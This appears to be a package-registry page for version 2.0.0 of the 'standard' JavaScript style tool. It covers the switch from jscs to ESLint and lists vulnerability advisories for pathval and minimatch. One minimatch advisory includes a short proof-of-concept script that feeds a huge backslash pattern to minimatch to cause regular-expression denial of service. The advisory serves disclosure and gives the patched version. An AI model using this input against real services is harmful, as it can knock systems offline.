Standard version 2.0.0 introduces a notable change by incorporating ESLint, a popular JavaScript linting tool, into its core functionality. This distinguishes it from version 1.5.0, which relied on jscs and jshint for code style enforcement. Both versions share core dependencies such as glob, split, jshint, find-root, and minimatch for file system and code manipulation; the one change is that jscs in 1.5.0 is replaced by eslint in 2.0.0, a modernization of the underlying linting engine. This gives developers a more extensible and configurable linting experience, given ESLint's plugin-based architecture and wider community support.
Developers considering migrating to version 2.0.0 should be aware of the implications of switching from jscs/jshint to ESLint: existing configurations or rulesets may need adjusting to align with ESLint's syntax and capabilities. In return, ESLint's robustness and extensive rule library provide more granular control over JavaScript code style, which can lead to more consistent and maintainable codebases. The developer dependencies mkdirp, rimraf, and run-series are unchanged between the versions, suggesting that the core build and testing processes are the same. Finally, version 2.0.0 was released on January 29, 2015, one day after version 1.5.0, reflecting the ongoing development and refinement of the standard JavaScript style.
All vulnerabilities related to version 2.0.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// pattern of "[!" followed by a very long run of backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.